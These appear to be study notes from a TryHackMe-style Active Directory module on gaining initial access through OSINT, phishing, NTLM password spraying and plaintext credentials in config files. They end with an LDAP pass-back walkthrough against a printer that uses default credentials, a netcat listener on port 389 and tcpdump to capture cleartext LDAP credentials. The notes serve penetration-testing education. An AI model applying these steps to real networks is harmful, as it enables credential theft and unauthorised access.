Breaching Active Directory

  • In this module by breaching we mean getting the initial access that we can then utilize to enumerate and do lateral movement in the active directory.

  • Two popular methods for gaining access to that first set of AD credentials is Open Source Intelligence (OSINT) and Phishing:

    • OSINT: It's data that has been publicly exposed (i.e. data in forums posted by employees or hard-coded credentials that are posted in a code repository in GitHub)

    • Phishing: Having users either provide their credentials on a malicious web page or ask them to run a specific application that would install a Remote Access Trojan (RAT) in the background.

New Technology Lan Manager (NTLM)

  • New Technology LAN Manager (NTLM) is the suite of security protocols used to authenticate users' identities in AD.

  • This authentication mechanism is heavily used by the services on a network. However, services that use NetNTLM can also be exposed to the internet. The following are some of the popular examples:

    • Internally-hosted Exchange (Mail) servers that expose an Outlook Web App (OWA) login portal.

    • Remote Desktop Protocol (RDP) service of a server being exposed to the internet.

    • Exposed VPN endpoints that were integrated with AD.

    • Web applications that are internet-facing and make use of NetNTLM.

  • These exposed services provide an excellent location to test credentials discovered using other means. However, these services can also be used directly in an attempt to recover an initial set of valid AD credentials.

  • Since most AD environments have account lockout configured, we won't be able to run a full brute-force attack. Instead, we need to perform a password-spraying attack. Instead of trying multiple different passwords, which may trigger the account lockout mechanism, we choose and use one password and attempt to authenticate with all the usernames we have acquired.

Lightweight Directory Access Protocol (LDAP)

  • LDAP authentication is similar to NTLM authentication. However, with LDAP authentication, the application directly verifies the user's credentials. The application has a pair of AD credentials that it can use first to query LDAP and then verify the AD user's credentials.

  • LDAP authentication is a popular mechanism with third-party (non-Microsoft) applications that integrate with AD. These include applications and systems such as:

    • Gitlab

    • Jenkins

    • Custom-developed web applications

    • Printers

    • VPNs

  • If any of these applications or services are exposed on the internet, the same type of attacks as those leveraged against NTLM authenticated systems can be used. However, since a service using LDAP authentication requires a set of AD credentials, it opens up additional attack avenues. In essence, we can attempt to recover the AD credentials used by the service to gain authenticated access to AD.

  • If you could gain a foothold on the correct host, such as a Gitlab server, it might be as simple as reading the configuration files to recover these AD credentials.

  • These credentials are often stored in plain text in configuration files since the security model relies on keeping the location and storage configuration file secure rather than its contents.

LDAP Pass-back Attack

  • This is a common attack against network devices, such as printers, when you have gained initial access to the internal network.

  • LDAP Pass-back attacks can be performed when we gain access to a device's configuration where the LDAP parameters are specified. This can be, for example, the web interface of a network printer. Usually, the credentials for these interfaces are kept to the default ones, such as admin:admin or admin:password.

  • Here, we won't be able to directly extract the LDAP credentials since the password is usually hidden. However, we can alter the LDAP configuration, such as the IP or hostname of the LDAP server. In an LDAP Pass-back attack, we can modify this IP to our IP and then test the LDAP configuration, which will force the device to attempt LDAP authentication to our rogue device. We can intercept this authentication attempt to recover the LDAP credentials.

  • Let's take an example of a printer

    • We first found out that there is a printer with the link printer.domain.xyz.com

    • We then enumerated the printer and found the settings URI which is settings.aspx, so we accessed the printer settings using this link http://printer.domain.xyz.com/settings.aspx

    • After that, we tried default credentials and got in.

    • We find this setting, we can see the username but not the password.

    • We try to view the password using view source but that doesn't work.

    • So we perform a Pass-back attack.

    • We first start a listener on our device on the LDAP port, 389. (nc -lvp 389) This is quite basic and the better and right.

    • To apply more advanced settings, instead of using nc we should use a rouge LDAP, for example, OpenLDAP.

    • Through OpenLDAP or any other rouge LDAP, we should change the authentication mechanism to the least secure (Login & Plain) to ensure that we get a clear password.

    • sudo tcpdump -SX -i <Interface Name> tcp port 389

    • We change the IP address of the server to our IP address.

    • We save the settings and then test the settings.

Authentication Relays

PreviousActive Directory (TryHackMe)NextEnumerating Active Directory

Last updated